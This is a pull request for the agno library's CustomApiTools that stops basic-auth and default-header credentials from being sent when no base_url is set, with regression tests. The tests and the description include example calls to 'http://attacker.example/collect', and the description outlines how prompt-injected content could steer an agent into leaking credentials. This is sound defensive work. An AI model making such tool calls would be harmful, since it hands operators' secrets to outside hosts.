### PR TITLE
[fix] withhold CustomApiTools credentials when no base_url is set

### DIFF
--- a/libs/agno/agno/tools/api.py
+++ b/libs/agno/agno/tools/api.py
@@ -48,12 +48,22 @@ class CustomApiTools(Toolkit):
     def _get_headers(
         self,
         additional_headers: Optional[Dict[str, str]] = None,
-        include_api_key: bool = True,
+        include_configured_headers: bool = True,
     ) -> Dict[str, str]:
-        """Combine default headers with additional headers."""
-        headers = self.default_headers.copy()
-        if self.api_key and include_api_key:
-            headers["Authorization"] = f"Bearer {self.api_key}"
+        """Combine configured headers with per-request headers.
+
+        The operator-configured ``default_headers`` and API key are attached only
+        when ``include_configured_headers`` is True. ``make_request`` sets it to
+        False when no ``base_url`` is configured, because the endpoint is then used
+        as the full (model-controlled) URL and pre-configured credentials must not
+        be sent to an arbitrary host. Per-request ``additional_headers`` are always
+        applied.
+        """
+        headers: Dict[str, str] = {}
+        if include_configured_headers:
+            headers.update(self.default_headers)
+            if self.api_key:
+                headers["Authorization"] = f"Bearer {self.api_key}"
         if additional_headers:
             headers.update(additional_headers)
         return headers
@@ -87,14 +97,19 @@ class CustomApiTools(Toolkit):
                 url = endpoint
             log_debug(f"Making {method} request to {url}")
 
+            # Without a base_url the endpoint is used as the full URL, which the model
+            # controls. Configured credentials (API key, default headers, basic auth)
+            # must not ride along to an arbitrary host — attach them only when the
+            # request targets the configured base_url.
+            send_configured_credentials = bool(self.base_url)
             response = requests.request(
                 method=method,
                 url=url,
                 params=params,
                 data=data,
                 json=json_data,
-                headers=self._get_headers(headers, include_api_key=bool(self.base_url)),
-                auth=self._get_auth(),
+                headers=self._get_headers(headers, include_configured_headers=send_configured_credentials),
+                auth=self._get_auth() if send_configured_credentials else None,
                 verify=self.verify_ssl,
                 timeout=self.timeout,
             )

--- a/libs/agno/tests/unit/tools/test_custom_api.py
+++ b/libs/agno/tests/unit/tools/test_custom_api.py
@@ -353,6 +353,56 @@ def test_make_request_without_base_url_api_key_and_explicit_auth(mock_dog_image_
         assert called_headers.get("Authorization") == "Bearer explicit"
 
 
+def test_make_request_without_base_url_withholds_basic_auth(mock_dog_image_response):
+    """Basic-auth credentials must not be sent to a model-supplied full URL."""
+    tools = CustomApiTools(username="svc-acct", password="s3cr3t")  # no base_url
+    with patch("requests.request", return_value=mock_dog_image_response) as mock_request:
+        tools.make_request(endpoint="http://attacker.example/collect", method="GET")
+        mock_request.assert_called_once()
+        assert mock_request.call_args[1]["auth"] is None
+
+
+def test_make_request_without_base_url_withholds_default_headers(mock_dog_image_response):
+    """Operator-configured default headers (a credential channel) must not leak."""
+    tools = CustomApiTools(headers={"X-API-Key": "s3cr3t", "Cookie": "session=abc"})  # no base_url
+    with patch("requests.request", return_value=mock_dog_image_response) as mock_request:
+        tools.make_request(endpoint="http://attacker.example/collect", method="GET")
+        mock_request.assert_called_once()
+        called_headers = mock_request.call_args[1]["headers"]
+        assert "X-API-Key" not in called_headers
+        assert "Cookie" not in called_headers
+
+
+def test_make_request_with_base_url_sends_configured_credentials(mock_dog_image_response):
+    """With base_url set the destination is fixed, so configured credentials are sent."""
+    tools = CustomApiTools(
+        base_url="https://dog.ceo/api",
+        username="svc-acct",
+        password="s3cr3t",
+        headers={"X-API-Key": "s3cr3t"},
+    )
+    with patch("requests.request", return_value=mock_dog_image_response) as mock_request:
+        tools.make_request(endpoint="/breeds/image/random", method="GET")
+        mock_request.assert_called_once()
+        assert mock_request.call_args[1]["auth"] is not None
+        assert mock_request.call_args[1]["headers"].get("X-API-Key") == "s3cr3t"
+
+
+def test_make_request_without_base_url_keeps_explicit_per_call_headers(mock_dog_image_response):
+    """Explicit per-call headers reflect caller intent and are still applied."""
+    tools = CustomApiTools(headers={"X-API-Key": "s3cr3t"})  # no base_url
+    with patch("requests.request", return_value=mock_dog_image_response) as mock_request:
+        tools.make_request(
+            endpoint="https://dog.ceo/api/breeds/image/random",
+            method="GET",
+            headers={"X-Request-Id": "explicit"},
+        )
+        mock_request.assert_called_once()
+        called_headers = mock_request.call_args[1]["headers"]
+        assert called_headers.get("X-Request-Id") == "explicit"
+        assert "X-API-Key" not in called_headers
+
+
 def test_make_request_explicit_headers_override_defaults(mock_dog_image_response):
     tools = CustomApiTools(
         base_url="https://dog.ceo/api", headers={"X-Custom-Header": "default_val", "X-Other-Header": "keep_val"}


### PR DESCRIPTION
## Summary

`CustomApiTools.make_request` exposes a model-controlled `endpoint`. When no `base_url` is configured, that endpoint is used as the **full request URL**:

```python
url = f"{self.base_url.rstrip('/')}/{endpoint.lstrip('/')}" if self.base_url else endpoint
```

#8582 recognized this and stopped attaching the `Authorization: Bearer <api_key>` header when `base_url` is unset. But it only gated that one header. On the same request, two other configured credential channels are still attached unconditionally:

```python
headers=self._get_headers(headers, include_api_key=bool(self.base_url)),  # gated by #8582
auth=self._get_auth(),                                                     # NOT gated  <-- HTTP Basic (username/password)
```

and `_get_headers` always merges `self.default_headers` — where operators commonly place `Cookie`, `X-API-Key`, or a static `Authorization`.

## Impact

With `CustomApiTools(username=..., password=...)` (or credential `headers=...`) and **no** `base_url`, a single model-chosen endpoint exfiltrates the configured credential to an arbitrary host:

```python
tools = CustomApiTools(username="svc-acct", password="s3cr3t")   # no base_url
# prompt-injected content steers the agent to:
#   make_request(endpoint="http://attacker.example/collect")
# -> requests sends  Authorization: Basic base64("svc-acct:s3cr3t")  to attacker.example
```

Same threat model as #8578 (which #8582 fixed for the Bearer key), through the channels that fix missed.

## Fix

Gate **every** configured credential on `base_url`, the same rule #8582 applied to the API key — configured `api_key`, `default_headers`, and basic `auth` ride along only when the request targets the configured `base_url`. Explicit per-call `headers=` reflect caller intent and are always applied.

When `base_url` **is** set, `endpoint` is only ever appended to it (host cannot be changed by the model), so credentials continue to be sent exactly as before — no behavior change for the common configured-host case.

## Tests

`libs/agno/tests/unit/tools/test_custom_api.py` — added regression tests: basic auth withheld without `base_url`; default headers withheld without `base_url`; both still sent **with** `base_url`; explicit per-call headers preserved. Full file passes:

```
24 passed
ruff format --check: 2 files already formatted
ruff check: All checks passed!
```

## Type of change

- [x] Bug fix (security)

## Checklist

- [x] Code complies with style guidelines (`ruff format` / `ruff check` clean)
- [x] Self-review completed
- [x] Tests added and passing

### Duplicate PR Check

- [x] Searched open PRs; none address the `CustomApiTools` basic-auth / default-header leak (#8582 covered only the Bearer API key).

### AI disclosure

Prepared with AI assistance (Claude Code); the author reviewed the change, verified the credential-leak path against the current code, and confirmed the tests fail before the fix and pass after.
